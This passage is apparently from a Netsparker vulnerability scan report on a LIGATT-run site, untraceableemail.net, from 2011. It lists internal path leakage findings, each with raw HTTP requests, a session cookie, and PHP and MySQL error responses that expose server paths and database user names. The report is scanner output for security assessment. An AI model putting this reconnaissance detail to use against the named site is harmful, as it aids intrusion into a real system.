User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Sat, 23 Apr 2011 04:38:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Location: spoofnetACCESS.php
Connection: Close
Content-Length: 7502
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>SPOOF NET</title><meta name="description" content=""><meta name="keywords" content=""><style type="text/css">/* GLOBAL ELEMENTS */html,body { margin: 0; padding: 0; background: #0b1933; font-size: 100%; font-family: "trebuchet ms", arial, verdana; color: #444; text-align: center;}a { color: #EF7B0A; text-decoration:none; }a:hover { text-decoration: underline;}p { color: #444; line-height: 170%; margin: 5px 0;}p, td, th, ul { font-size: 80%;}/* LAYOUT */#wrapper { width: 700px; margin: 0 auto 0 auto; text-align: left;}#content { background: #fff; border-top: 3px solid #ce6c1c; border-bottom: 3px solid #ce6c1c; padding: 20px;}/* ELEMENTS */h1 { font: 250% "trebuchet ms"; color: #fff; padding: 40px 0 10px 10px; margin: 0;}h1 span { color: #6BAD42; }h1 a { color: #FFF; }h1 a:hover { color: #6BAD42; text-decoration: none;}h1 a:hover span { color: #FFF;}h2 { font: bold 100% arial, verdana, sans-serif; color: #3B578B; border-bottom: 1px solid #ccc; padding-bottom: 3px; margin: 25px 0 10px 0;}p+p { padding-top: 1em; }form.form { font-size: 80%; background-color: #f5f5f5; padding: 10px;}#options { list-style-type: none; width: 500px; margin: 10px; padding: 0;}#options li { float: left; width: 240px; border-left: 5px solid #ccc;}#footer { margin: 10px 0 0 0; font-size: 80%; color: #ccc;}#nav { text-align: right; list-style-type: none; font-size: 80%; border-top: 1px solid #ccc; margin: 20px 0 0 0; padding: 0;}#nav li { padding: 0 5px 0 5px; display: inline; border-left: 1px solid #ccc;}.left { float: left;}/* STYLES */.first { margin-top: 0 }input.textbox { width: 500px; font: 120% arial, verdana, sans-serif; }input.button {font: 120% arial, verdana, sans-serif; margin-top: 10px;}label { font-weight: light; }#error { border: 1px solid red; border-left: 5px solid red; padding: 2px; margin: 5px 0 15px 0; background: #eee;}/* TABLES USED IN COOKIE MANAGEMENT / EDIT BROWSER PAGES */table { border-color: #666; border-width: 0 0 1px 1px; border-style: solid; width: 50%;}th { font-size: normal; background: #ccc; border-width: 2px;}td, th { border-color: #666; border-width: 1px 1px 0 0; border-style: solid; padding: 2px 10px 2px 10px;}td {background: #eee;}.full-width { width: 98%;}.large-table { width: 75%; margin-top: 15px;}.large-table td, .large-table th { padding: 5px;}td.small-note { font-size: 60%; padding: 2px; text-align: right;}/* TOOLTIP HOVER EFFECT */label { font-weight: bold; line-height: 20px; cursor: help; }#tooltip{ width:20em; color: #fff; background: #555; font-size: 12px; font-weight: normal; padding: 5px; border: 3px solid #333; text-align: left; }</style> <script type="text/javascript">ginf={url:'http://www.untraceableemail.net/proxy',script:'browse.php',target:{h:'',p:'',b:''},enc:{u:'',e:'1',p:''},b:'5'}</script> <script type="text/javascript" src="http://www.untraceableemail.net/proxy/includes/main.js"></script><script type="text/javascript">window.addDomReadyFunc(function() { document.getElementById('options').style.display = 'none'; document.getElementById('input').focus();});disableOverride();</script></head><body> <div id="wrapper"> <div id="header"> <h1><a href="index.php"><img src='net1.png' border=0></a></h1> </div> <div id="content"> <!-- CONTENT START --> <!--[error]--> <h2 class="first">About SPOOFNET</h2> <p>SPOOFNET keeps you anonymous from the sites you visit and allows you to bypass any network restrictions from your government, workplace or college.</p> <p>Your Account will expire on: <FONT COLOR=RED></FONT></p> <h2>Enter URL</h2> <form action="includes/process.php?action=update" method="post" onsubmit="return updateLocation(this);" class="form"> <input type="text" name="u" id="input" size="40" class="textbox"> <input type="submit" value="Go" class="button"> &nbsp; [<a style="cursor:pointer;" onclick="document.getElementById('options').style.display = (document.getElementById('options').style.display=='none'?'':'none')">options</a>] <ul id="options"> <li> <input type="checkbox" name="encodeURL" id="encodeURL" checked="checked"> <label for="encodeURL" class="tooltip" onmouseover="tooltip('Encodes the URL of the page you are viewing so that it does not contain the target site in plaintext.')" onmouseout="exit();">Encode URL</label> </li> <li> <input type="checkbox" name="encodePage" id="encodePage"> <label for="encodePage" class="tooltip" onmouseover="tooltip('Helps avoid filters by encoding the page before sending it and decoding it with javascript once received. This is not 100% reliable and may break functionality in some browsers.')" onmouseout="exit();">Encode Page</label> </li> <li> <input type="checkbox" name="allowCookies" id="allowCookies" checked="checked"> <label for="allowCookies" class="tooltip" onmouseover="tooltip('Cookies may be required on interactive websites (especially where you need to log in) but advertisers also use cookies to track your browsing habits.')" onmouseout="exit();">Allow Cookies</label> </li> <li> <input type="checkbox" name="stripJS" id="stripJS"> <label for="stripJS" class="tooltip" onmouseover="tooltip('Remove scripts to protect your anonymity and speed up page loads. However, not all sites will provide an HTML-only alternative. (Recommended)')" onmouseout="exit();">Remove Scripts</label> </li> <li> <input type="checkbox" name="stripObjects" id="stripObjects"> <label for="stripObjects" class="tooltip" onmouseover="tooltip('You can increase page load times by removing unnecessary Flash, Java and other objects. If not removed, these may also compromise your anonymity.')" onmouseout="exit();">Remove Objects</label> </li> </ul> <br style="clear: both;"> </form> <!-- CONTENT END --> <!--// Optional navigation supplied. Uncomment and edit if you want to use but make sure the pages exist! <ul id="nav"> <li class="left"><a href="index.php">Home</a></li> <li class="left"><a href="edit-browser.php">Edit Browser</a></li> <li class="left"><a href="cookies.php">Manage Cookies</a></li> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="disclaimer.php">Disclaimer</a></li> <li><a href="terms.php">Terms of Use</a></li> </ul> --> </div> <div id="footer"> &copy; 2009 <a href="index.php">SPOOF NET</a> : Powered by <a href="http://www.ligattsecurity.net/">LIGATT</a></div> </div></body></html>
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

7 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /email_snitch/delete_history.php

/email_snitch/delete_history.php

http://www.untraceableemail.net/email_snitch/delete_history.php

Identified Internal Path(s)

/var/www/html/email_snitch/delete_history.php

Request

GET /email_snitch/delete_history.php HTTP/1.1
Referer: http://www.untraceableemail.net/email_snitch/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Sat, 23 Apr 2011 04:40:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: index.php
Content-Length: 148
Connection: close
Content-Type: text/html; charset=UTF-8


NULL<br /><b>Warning</b>: Invalid argument supplied for foreach() in <b>/var/www/html/email_snitch/delete_history.php</b> on line <b>8</b><br />
- /proxy/includes/process.php

/proxy/includes/process.php

http://www.untraceableemail.net/proxy/includes/process.php?action=update

Identified Internal Path(s)

Request

GET /proxy/includes/process.php?action=update HTTP/1.1
Referer: http://www.untraceableemail.net/proxy/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:40:12 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 482
Connection: close
Content-Type: text/html; charset=UTF-8


<br /><b>Warning</b>: require_once(config.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/var/www/html/proxy/includes/init.php</b> on line <b>6</b><br /><br /><b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'config.php' (include_path='.:/usr/share/pear:/usr/share/php') in <b>/var/www/html/proxy/includes/init.php</b> on line <b>6</b><br />
- /login/newUserSignUp2.php

/login/newUserSignUp2.php

http://www.untraceableemail.net/login/newUserSignUp2.php?ref=

Identified Internal Path(s)

Request

GET /login/newUserSignUp2.php?ref= HTTP/1.1
Referer: http://www.untraceableemail.net/login/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:40:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<html><br /><b>Warning</b>: include(header.html) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in <b>/var/www/html/login/newUserSignUp2.php</b> on line <b>19</b><br /><br /><b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening 'header.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in <b>/var/www/html/login/newUserSignUp2.php</b> on line <b>19</b><br /><title>Login</title><style type="text/css"> <!--body { font-family: Arial, Helvetica, sans-serif;}.fpass { font-family: Arial, Helvetica, sans-serif;}#form1 table tr td #uname12 { font-family: Arial, Helvetica, sans-serif;}small { font-size: 8px;}.smaller { font-size: 10px; color:#F00}.alert { font-size: 16px; color:#F00}--></style><style type="text/css">.redstar {color: #FF0000;}<!--.LV_validation_message{ font-weight:bold;font-size:10px;margin:0 0 0 5px; }.LV_valid { color: #006600; }.LV_invalid { color:#CC0000; }.LV_valid_field,userfield4input.LV_valid_field:hover, input.LV_valid_field:active,textarea.LV_valid_field:hover, textarea.LV_valid_field:active {}.LV_invalid_field, input.LV_invalid_field:hover, input.LV_invalid_field:active,textarea.LV_invalid_field:hover, textarea.LV_invalid_field:active { border: 1px solid #CC0000;}--></style><!--.LV_validation_message{ font-weight:bold;font-size:10px;margin:0 0 0 5px; }.LV_valid { color: #006600; }.LV_invalid { color:#CC0000; }.LV_valid_field,userfield4input.LV_valid_field:hover, input.LV_valid_field:active,textarea.LV_valid_field:hover, textarea.LV_valid_field:active {}.LV_invalid_field, input.LV_invalid_field:hover, input.LV_invalid_field:active,textarea.LV_invalid_field:hover, textarea.LV_invalid_field:active { border: 1px solid #CC0000;}--></style><script type="text/javascript" src="library/country.js"></script><script type="text/javascript" src="library/ajax.js"></script><script type="text/javascript" src="livevalidation.js"></script><script type="text/javascript" src="_zSelectUser.js"></script></head><script type="application/javascript">function showDiv(thislayer){ document.getElementById(thislayer).style.display='block';}/*function goPage(){ window.location="http://www.untraceableemail.net/login/newUserSignUp2.php" }*/</script><script type="text/javascript"><!--var btype;var bval;function toggle_visibility(id) { var e = document.getElementById(id); if(e.style.display == 'block') e.style.display = 'none'; else e.style.display = 'block';}function toggleDisplayCCDC() { document.getElementById("ccdc_div").style.visibility = "visible";}function toggleDisplayCCDC2() { document.getElementById("ccdc_div").style.visibility = "hidden";}function toggleDisplayCCDC3() { document.getElementById("dealer_div").style.visibility = "visible"; document.getElementById("ccdc_set").style.visibility = "hidden"; document.getElementById("ccdc_div").style.visibility = "hidden";}function toggleDisplayCCDC4() { document.getElementById("dealer_div").style.visibility = "hidden"; document.getElementById("ccdc_set").style.visibility = "visible";}function setFullBatch(){ btype = new Number(100); bval = new Number(2.50);}function setHalfBatch(){ btype = new Number(50); bval = new Number(3.00);}function setQuarterBatch(){ btype = new Number(25); bval = new Number(3.50);}function minCalc(x){var y=document.getElementById(x).value; var a=bval; var b=btype; var c=new Number(y); var z=((b)*(a)*(c)); var t="$"+z; document.getElementById("batchAmt").innerHTML=t;}function goToDealer(){ window.location='../dealer/index.php?ref=';}function goToBusiness(){ window.location='newUserSignUp2.php?ref=';}function goToPersonal(){ window.location='newUserSignUp.php?ref=';}//--></script><body bgcolor = "#FFFFFF" text = "#000000" ><div class="logo"><img src="eagleLogo.jpg" width="150" height="188" alt="EAGLE LOGO"></div><div class='showUser'><h2>New Customer Sign Up</h2><p><em><strong>Personal</strong> - <span class="color">Allows you to scan your computer for free. You have to choose to pay for a vulnerability report if the scan finds vulnerabilities.</span></em></p><p><em><strong>Business</strong> - <span class="color">Business Accounts cost $29.95 a year. With this subscription you will be able to use LIGATT Security Suites services at a discount up to 25% off. You will also be able to perform security test on any IP Address, whereas Personal accounts can only test the network or computer they are connected to.</span></em></p></div><div class="rates"><table><tr><td width='100'><strong>Application</strong></td><td width='84'><strong>Personal</strong></td><td width='92'><strong>Business</strong></td></tr><tr><td><strong>Tattletell</strong></td><td>$9.95</td><td>$7.46</td></tr><tr><td><strong>IPSnitch</strong></td><td>$9.95</td><td>$7.46</td></tr><tr><td><strong>Recon</strong></td><td>$29.95</td><td>$49.95</td></tr><tr><td><strong>PortSnitch</strong></td><td>$29.95</td><td>$19.95</td></tr><tr><td><strong>SpoofNet</strong></td><td>$9.95</td><td>$7.46</td></tr><tr><td><strong>BOOBYTRAP</strong></td><td>$49.95</td><td>$49.95</td></tr><tr><td><strong>LocatePC</strong></td><td>Free</td><td>Free</td></tr></table></div> <div class="choice"> <form id="form1" name="form1" method="post" action="createUser.php"> <table> <tr> <td colspan=4>Is this account for business or personal use?<br/> <label><input type="radio" name="use" id="personal" value="personal" onClick="javascript:goToPersonal();"> <strong>Personal</strong></label> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <label><input type="radio" name="use" id="business" checked=checked value="business" onClick="javascript:goToBusiness();"> <strong>Business</strong></label> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <label><input type="radio" name="use" id="dealer" value="dealer" onClick="javascript:goToDealer();"> <strong>Dealer</strong></label> </td> </tr> <tr> <td colspan="6"><span class="alert"></span></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td><b>First Name: </b></td> <td colspan="2"><input type=text name='fname' id='fname' value=''><script type="text/javascript"> var fname = new LiveValidation("fname"); fname.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td width="384"></td> </tr> <tr> <td><b>Last Name: </b></td> <td colspan="2"><input type=text name='lname' id='lname' value=''><script type="text/javascript"> var lname = new LiveValidation("lname"); lname.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td></td> </tr> <tr> <td><b>Company: </b></td> <td colspan="2"><input type=text name='company' id='company' value=''></td> <td></td> </tr> <tr> <td><b>Address: </b></td> <td colspan="2"><input type=text name='address_1' id='address_1' value=''></td> <td></td> </tr> <tr> <td><b>City:</b></td> <td colspan="2"><input type=text name='city' id='city' value=''><script type="text/javascript"> var city = new LiveValidation("city"); city.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td></td> </tr> <tr> <td><b>Country:</b></td> <td colspan="2"><select name='cboCountry' id='cboCountry' onChange='Fill_States();'> <option selected='selected'>12345678901234567890</option> <option>temp</option> </select></td> <td></td> </tr> <tr> <td><b>State/Province:</b></td> <td colspan="2"><select name='cboState' id='cboState' onChange='Update_Globals();'> <option selected='selected'>12345678901234567890</option> <option>temp</option> </select></td> <td></td> </tr> <tr> <td><b>Zip:</b></td> <td colspan="2"><input type=text name='zip' id='zip' value=''></td> <td></td> </tr> <tr> <td><b>Phone: </b></td> <td colspan="2"><input type=text name='phone' id='phone' value=''><script type="text/javascript"> var phone = new LiveValidation("phone"); phone.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <td></td> </tr> <td><b>Cell Phone: </b></td> <td colspan="2"><input type=text name='cell_phone' id='cell_phone' value=''><script type="text/javascript"> var phone = new LiveValidation("cell_phone"); phone.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> <tr> <td><b>Email: </b></td> <td colspan="3"><input type=text name='email' id='email' value=''><script type="text/javascript"> var email = new LiveValidation("email"); email.add(Validate.Email);</script> <br/><span class="smaller">All reports will be sent to this email address</span></td> </tr> <tr> <td><b>Tax ID:</b></td> <td colspan="3"><input type=text name='taxID' id='taxID' value=''></td> </tr> <tr> <td><b>Reference 1 Name:</b></td> <td colspan="3"><input type=text name='ref_name1' id='ref_name1' value=''><script type="text/javascript"> var fname = new LiveValidation("ref_name1"); fname.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> </tr> <tr> <td><b>Reference 1 Email:</b></td> <td colspan="3"><input type=text name='ref_email1' id='ref_email1' value=''><script type="text/javascript"> var email = new LiveValidation("ref_email1"); email.add(Validate.Email);</script> </td> </tr> <tr> <td><b>Reference 1 Phone:</b></td> <td colspan="2"><input type=text name='ref_phone1' id='ref_phone1' value=''><script type="text/javascript"> var phone = new LiveValidation("ref_phone1"); phone.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script> </td> </tr> <tr> <td><b>Reference 2 Name:</b></td> <td colspan="3"><input type=text name='ref_name2' id='ref_name2' value=''><script type="text/javascript"> var fname = new LiveValidation("ref_name2"); fname.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script></td> </tr> <tr> <td><b>Reference 2 Email:</b></td> <td colspan="3"><input type=text name='ref_email2' id='ref_email2' value=''><script type="text/javascript"> var email = new LiveValidation("ref_email2"); email.add(Validate.Email);</script> </td> </tr> <tr> <td><b>Reference 2 Phone:</b></td> <td colspan="2"><input type=text name='ref_phone2' id='ref_phone2' value=''><script type="text/javascript"> var phone = new LiveValidation("ref_phone2"); phone.add( Validate.Presence,{ failureMessage: "This field is required!" } );</script> </td> </tr> <tr> <td id ="uNameHint"><b>User Name:</b></td> <td colspan="3"><input type=text name='uName' id='uName' value='' onChange="checkUser(this.value)"> <br/><span class="smaller">This is the log in ID for your account</span></td> </tr> <tr> <td id ="passHint"><b>Password:</b></td> <td colspan="3"><input type=password name='email2' id='email2' value='' onChange="checkPass(this.value)"> <br/><span class="smaller">This is the password for your account</span></td> </tr> <tr> <td colspan="2"><div id="ccdc_set" style="visibility:visible"><b>Have CCDC Card? </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Yes<input type=radio name='ccdc' id='yes' value='yes' onClick="javascript:toggleDisplayCCDC();">&nbsp;&nbsp;No<input type=radio name='ccdc' id='no' value='no' onClick="javascript:toggleDisplayCCDC2();"> <br/><span class="smaller">Cyber Crime Defence Card</span> </div> </td> <td></td> </tr> <tr> <td>&nbsp;</td> <td><div id='ccdc_div' style="visibility:hidden"> Card Number: <input type=text name='card' id='card' value=''/> <!--<br/>Add Funds: &nbsp;&nbsp;&nbsp;&nbsp;<input type=text name='money' id='money' value='' />--> </div> </td> </tr> </td> </tr> <tr> <td> <!-- pass a session id to the query string of the script to prevent ie caching --><img src='../captcha/securimage_show.php?sid=320154d952a29a6c0efa98d32a0247b9' alt="CAPTCHA Image" id="image" /></td><td><input type="text" name="code" /></td></tr><tr><td><a href="#" onClick="document.getElementById('image').src = '../captcha/securimage_show.php?sid=' + Math.random(); return false">Reload Image</a></td><td>&nbsp; </td> </tr> <tr><td>&nbsp;</td></tr> <tr> <td><input type='submit' name='submit' id='submit' value='Create New User'></td> <td colspan="2"><div id=status></div> <td></td> </tr> <tr> <td colspan="4"><label> <input type="checkbox" name="terms" id="terms"> I agree to the <a href="terms.php" target=_blank>terms</a> of this site.</label> <script type="text/javascript"> var terms = new LiveValidation('terms'); terms.add(Validate.Acceptance ); </script> </td> </tr> </table></div></form><div style="top:250px; left:10px; position:absolute;"><input type="button" onClick="javascript:history.go(-1);" value="Back"/></div> <script type="text/javascript"> Fill_Country(); Fill_States(); document.form1.cboCountry.selectedIndex=239; Fill_States(); </script> <script type="text/JavaScript">var TFN='';var TFA='';var TFI='0';var TFL='0';var tf_RetServer="rt.trafficfacts.com";var tf_SiteId="15377gfaeb94703f60956b3814920288c4ebb12fed1bcah12";var tf_ScrServer=document.location.protocol+"//rt.trafficfacts.com/tf.php?k=15377gfaeb94703f60956b3814920288c4ebb12fed1bcah12;c=s;v=5";document.write(unescape('%3Cscript type="text/JavaScript" src="'+tf_ScrServer+'">%3C/script>'));</script><noscript><img src="http://rt.trafficfacts.com/ns.php?k=15377gfaeb94703f60956b3814920288c4ebb12fed1bcah12" height="1" width="1" alt=""/></noscript> </body> </html>
- /portsnitch/sendReport.php

/portsnitch/sendReport.php

http://www.untraceableemail.net/portsnitch/sendReport.php

Identified Internal Path(s)

/var/www/html/portsnitch/sendReport.php

Request

GET /portsnitch/sendReport.php HTTP/1.1
Referer: http://www.untraceableemail.net/portsnitch/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Sat, 23 Apr 2011 04:40:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 138
Connection: close
Content-Type: text/html; charset=UTF-8


<br /><b>Warning</b>: Invalid argument supplied for foreach() in <b>/var/www/html/portsnitch/sendReport.php</b> on line <b>13</b><br />
- /site/

/site/

http://www.untraceableemail.net/site/

Identified Internal Path(s)

/var/www/html/site/index.php

Request

GET /site/ HTTP/1.1
Referer: http://www.untraceableemail.net/site/spoofem/ajax-loader.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:40:52 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 1195
Connection: close
Content-Type: text/html; charset=UTF-8


<br /><b>Warning</b>: mysql_pconnect() [<a href='function.mysql-pconnect'>function.mysql-pconnect</a>]: Access denied for user 'root'@'localhost' (using password: YES) in <b>/var/www/html/site/index.php</b> on line <b>19</b><br /><br /><b>Warning</b>: mysql_select_db() [<a href='function.mysql-select-db'>function.mysql-select-db</a>]: Access denied for user 'apache'@'localhost' (using password: NO) in <b>/var/www/html/site/index.php</b> on line <b>20</b><br /><br /><b>Warning</b>: mysql_select_db() [<a href='function.mysql-select-db'>function.mysql-select-db</a>]: A link to the server could not be established in <b>/var/www/html/site/index.php</b> on line <b>20</b><br /><br /><b>Warning</b>: mysql_query() [<a href='function.mysql-query'>function.mysql-query</a>]: Access denied for user 'apache'@'localhost' (using password: NO) in <b>/var/www/html/site/index.php</b> on line <b>34</b><br /><br /><b>Warning</b>: mysql_query() [<a href='function.mysql-query'>function.mysql-query</a>]: A link to the server could not be established in <b>/var/www/html/site/index.php</b> on line <b>34</b><br />Database Error: Unable to connect to the database:Could not connect to MySQL
- /login/newUserSignUp.php

/login/newUserSignUp.php

http://www.untraceableemail.net/login/newUserSignUp.php?ref=

Identified Internal Path(s)

Request

GET /login/newUserSignUp.php?ref= HTTP/1.1
Referer: http://www.untraceableemail.net/login/newUserSignUp2.php?ref=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:40:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<html><br /><b>Warning</b>: include(header.html) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in <b>/var/www/html/login/newUserSignUp.php</b> on line <b>19</b><br /><br /><b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening 'header.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in <b>/var/www/html/login/newUserSignUp.php</b> on line <b>19</b><br /><title>Login</title><style type="text/css"> <!--body { font-family: Arial, Helvetica, sans-serif;}.fpass { font-family: Arial, Helvetica, sans-serif;}#form1 table tr td #uname12 { font-family: Arial, Helvetica, sans-serif;}small { font-size: 8px;}.smaller { font-size: 10px; color:#F00}.alert { font-size: 16px; color:#F00}--></style><style type="text/css">.redstar {color: #FF0000;}<!--.LV_validation_message{ font-weight:bold;font-size:10px;margin:0 0 0 5px; }.LV_valid { color: #006600; }.LV_invalid { color:#CC0000; }.LV_valid_field,userfield4input.LV_valid_field:hover, input.LV_valid_field:active,textarea.LV_valid_field:hover, textarea.LV_valid_field:active {}.LV_invalid_field, input.LV_invalid_field:hover, input.LV_invalid_field:active,textarea.LV_invalid_field:hover, textarea.LV_invalid_field:active { border: 1px solid #CC0000;}--></style><!--.LV_validation_message{ font-weight:bold;font-size:10px;margin:0 0 0 5px; }.LV_valid { color: #006600; }.LV_invalid { color:#CC0000; }.LV_valid_field,userfield4input.LV_valid_field:hover, input.LV_valid_field:active,textarea.LV_valid_field:hover, textarea.LV_valid_field:active {}.LV_invalid_field, input.LV_invalid_field:hover, input.LV_invalid_field:active,textarea.LV_invalid_field:hover, textarea.LV_invalid_field:active { border: 1px solid #CC0000;}--></style><script type="text/javascript" src="library/country.js"></script><script type="text/javascript" src="library/ajax.js"></script><script type="text/javascript" src="livevalidation.js"></script><script type="text/javascript" src="_zSelectUser.js"></script></head><script type="application/javascript">function showDiv(thislayer){ document.getElementById(thislayer).style.display='block';}/*function goPage(){ window.location="http://www.untraceableemail.net/login/newUserSignUp2.php" }*/</script><script type="text/javascript"><!--var btype;var bval;function toggle_visibility(id) { var e = document.getElementById(id); if(e.style.display == 'block') e.style.display = 'none'; else e.style.display = 'block';}function toggleDisplayCCDC() { document.getElementById("ccdc_div").style.visibility = "visible";}function toggleDisplayCCDC2() { document.getElementById("ccdc_div").style.visibility = "hidden";}function toggleDisplayCCDC3() { document.getElementById("dealer_div").style.visibility = "visible"; document.getElementById("ccdc_set").style.visibility = "hidden"; document.getElementById("ccdc_div").style.visibility = "hidden";}function toggleDisplayCCDC4() { document.getElementById("dealer_div").style.visibility = "hidden"; document.getElementById("ccdc_set").style.visibility = "visible";}function setFullBatch(){ btype = new Number(100); bval = new Number(2.50);}function setHalfBatch(){ btype = new Number(50); bval = new Number(3.00);}function setQuarterBatch(){ btype = new Number(25); bval = new Number(3.50);}function minCalc(x){var y=document.getElementById(x).value; var a=bval; var b=btype; var c=new Number(y); var z=((b)*(a)*(c)); var t="$"+z; document.getElementById("batchAmt").innerHTML=t;}function goToDealer(){ window.location='../dealer/index.php?ref=';}function goToBusiness(){ window.location='newUserSignUp2.php?ref=';}function goToPersonal(){ window.location='newUserSignUp.php?ref=';}//--></script><body bgcolor = "#FFFFFF" text = "#000000" ><div class="logo"><img src="eagleLogo.jpg" width="150" height="188" alt="EAGLE LOGO"></div><div class='showUser'><h2>New Customer Sign Up</h2><p><em><strong>Personal</strong> - <span class="color">Allows you to scan your computer for free. You have to choose to pay for a vulnerability report if the scan finds vulnerabilities.</span></em></p><p><em><strong>Business</strong> - <span class="color">Business Accounts cost $29.95 a year. With this subscription you will be able to use LIGATT Security Suites services at a discount up to 25% off. You will also be able to perform security test on any IP Address, whereas Personal accounts can only test the network or computer they are connected to.</span></em></p></div><div class="rates"><table><tr><td width='100'><strong>Application</strong></td><td width='84'><strong>Personal</strong></td><td width='92'><strong>Business</strong></td></tr><tr><td><strong>Tattletell</strong></td><td>$9.95</td><td>$7.46</td></tr><tr><td><strong>IPSnitch</strong></td><td>$9.95</td><td>$7.46</td></tr><tr><td><strong>Recon</strong></td><td>$29.95</td><td>$49.95</td></tr><tr><td><strong>PortSnitch</strong></td><td>$29.95</td><td>$19.95</td></tr><tr><td><strong>SpoofNet</strong></td><td>$9.95</td><td>$7.46</td></tr><tr><td><strong>BOOBYTRAP</strong></td><td>$49.95</td><td>$49.95</td></tr><tr><td><strong>LocatePC</strong></td><td>Free</td><td>Free</td></tr></table></div> <div class="choice"> <form id="form1" name="form1" method="post" action="createUser.php"> <table> <tr> <td colspan=4>Is this account for business or personal use?<br/> <label><input type="radio" name="use" id="personal" checked=checked value="personal"> <strong>Personal</strong></label> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <label><input type="radio" name="use" id="business" value="business" onClick="javascript:goToBusiness();"> <strong>Business</strong></label> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <label><input type="radio" name="use" id="dealer" value="dealer" onClick="javascript:goToDealer();"> <strong>Dealer</strong></label> </td> </tr> <tr> <td colspan="6"><span class="alert"></span></td> </tr> <tr> <td>&nbsp;</td> </tr> 